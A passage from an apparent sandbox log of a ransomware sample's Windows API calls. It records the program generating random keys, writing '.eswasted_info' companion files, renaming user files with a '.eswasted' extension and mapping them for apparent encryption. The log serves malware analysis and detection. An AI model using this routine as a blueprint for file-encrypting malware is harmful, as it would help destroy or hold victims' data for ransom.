dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0082.034] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1312110 | out: pbBuffer=0x1312110) returned 1 [0082.034] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0082.034] WriteFile (in: hFile=0x130, lpBuffer=0x1312110*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1312110*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0082.035] SetEndOfFile (hFile=0x130) returned 1 [0082.035] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.035] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0082.035] lstrcpyW (in: lpString1=0x71ec8c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.036] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url.eswasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url.eswasted")) returned 1 [0082.036] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url.eswasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0082.036] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0082.037] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0082.037] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0082.037] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.038] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0082.038] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0082.038] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.095] SetEndOfFile (hFile=0x130) returned 1 [0082.097] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0082.097] CloseHandle (hObject=0x130) returned 1 [0082.099] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0082.099] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0082.100] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0082.100] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.100] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url") returned 64 [0082.100] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x28a) returned 0x71ec18 [0082.100] lstrcpyW (in: lpString1=0x71ec98, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.100] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312110 [0082.100] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0082.101] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1312110 | out: pbBuffer=0x1312110) returned 1 [0082.101] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.101] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0082.102] WriteFile (in: hFile=0x130, lpBuffer=0x1312110*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1312110*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0082.103] SetEndOfFile (hFile=0x130) returned 1 [0082.103] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.103] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0082.103] lstrcpyW (in: lpString1=0x71ec98, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.104] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.eswasted" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url.eswasted")) returned 1 [0082.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.eswasted" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0082.186] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0082.186] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0082.187] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0082.187] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.187] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0082.188] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0082.188] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.196] SetEndOfFile (hFile=0x130) returned 1 [0082.198] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0082.198] CloseHandle (hObject=0x130) returned 1 [0082.200] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0082.201] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0082.201] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0082.201] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.201] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url") returned 65 [0082.201] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x28c) returned 0x71ec18 [0082.202] lstrcpyW (in: lpString1=0x71ec9a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.202] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312110 [0082.202] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0082.202] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1312110 | out: pbBuffer=0x1312110) returned 1 [0082.202] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0082.203] WriteFile (in: hFile=0x130, lpBuffer=0x1312110*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1312110*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0082.204] SetEndOfFile (hFile=0x130) returned 1 [0082.204] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.204] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0082.204] lstrcpyW (in: lpString1=0x71ec9a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.204] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url.eswasted" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url.eswasted")) returned 1 [0082.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url.eswasted" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0082.205] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0082.205] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0082.206] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0082.206] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.206] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0082.207] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0082.207] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.215] SetEndOfFile (hFile=0x130) returned 1 [0082.289] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0082.289] CloseHandle (hObject=0x130) returned 1 [0082.290] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0082.290] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0082.310] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0082.310] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.310] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 36 [0082.310] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x252) returned 0x71ec18 [0082.310] lstrcpyW (in: lpString1=0x71ec60, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.310] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312110 [0082.310] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0082.311] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1312110 | out: pbBuffer=0x1312110) returned 1 [0082.311] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1.eswasted_info" (normalized: "c:\\users\\default\\ntuser.dat.log1.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0082.347] WriteFile (in: hFile=0x130, lpBuffer=0x1312110*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1312110*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0082.348] SetEndOfFile (hFile=0x130) returned 1 [0082.348] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.348] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0082.348] lstrcpyW (in: lpString1=0x71ec60, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.348] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1.eswasted" (normalized: "c:\\users\\default\\ntuser.dat.log1.eswasted")) returned 1 [0082.349] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1.eswasted" (normalized: "c:\\users\\default\\ntuser.dat.log1.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0082.349] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0082.371] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0082.372] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0082.372] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.372] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0082.373] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0082.373] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.381] SetEndOfFile (hFile=0x130) returned 1 [0082.383] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0082.383] CloseHandle (hObject=0x130) returned 1 [0082.385] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0082.385] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0082.386] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0082.386] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.386] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 113 [0082.386] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2ec) returned 0x71ec18 [0082.387] lstrcpyW (in: lpString1=0x71ecfa, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.387] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312110 [0082.387] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0082.388] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1312110 | out: pbBuffer=0x1312110) returned 1 [0082.388] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.eswasted_info" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0082.388] WriteFile (in: hFile=0x130, lpBuffer=0x1312110*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1312110*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0082.389] SetEndOfFile (hFile=0x130) returned 1 [0082.390] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.390] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0082.390] lstrcpyW (in: lpString1=0x71ecfa, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.390] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.eswasted" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.eswasted")) returned 1 [0082.391] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.eswasted" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0082.391] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0082.547] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0082.548] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0082.548] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.548] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0082.549] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0082.549] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.557] SetEndOfFile (hFile=0x130) returned 1 [0082.559] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0082.559] CloseHandle (hObject=0x130) returned 1 [0082.561] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0082.561] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0082.562] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0082.562] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.562] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms") returned 50 [0082.562] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x26e) returned 0x6f5cc0 [0082.562] lstrcpyW (in: lpString1=0x6f5d24, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.562] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312110 [0082.562] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0082.563] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1312110 | out: pbBuffer=0x1312110) returned 1 [0082.563] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0082.563] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.eswasted_info" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0082.564] WriteFile (in: hFile=0x130, lpBuffer=0x1312110*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1312110*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0082.565] SetEndOfFile (hFile=0x130) returned 1 [0082.565] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.565] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0082.565] lstrcpyW (in: lpString1=0x6f5d24, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.566] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.eswasted" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms.eswasted")) returned 1 [0083.395] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.eswasted" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.395] GetLastError () returned 0x5 [0083.395] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.eswasted" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms.eswasted")) returned 0x23 [0083.395] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.eswasted", dwFileAttributes=0x22) returned 1 [0083.396] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.eswasted" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0083.396] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0083.396] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms.eswasted", dwFileAttributes=0x23) returned 1 [0083.396] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0083.396] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0083.397] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0083.397] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0083.397] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0083.398] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0083.398] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0083.409] SetEndOfFile (hFile=0x130) returned 1 [0083.411] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0083.411] CloseHandle (hObject=0x130) returned 1 [0083.413] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0083.413] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0083.414] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0083.414] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0083.414] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms") returned 57 [0083.414] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27c) returned 0x6f5cc0 [0083.414] lstrcpyW (in: lpString1=0x6f5d32, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0083.414] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312110 [0083.414] 